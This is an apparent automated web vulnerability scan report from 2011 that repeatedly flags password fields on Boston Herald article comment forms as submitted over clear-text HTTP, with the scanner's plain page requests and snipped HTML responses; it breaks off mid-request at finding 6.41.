...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.31. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.32. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.33. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.34. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.35. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.36. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.37. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.38. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.39. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.40. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.41. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
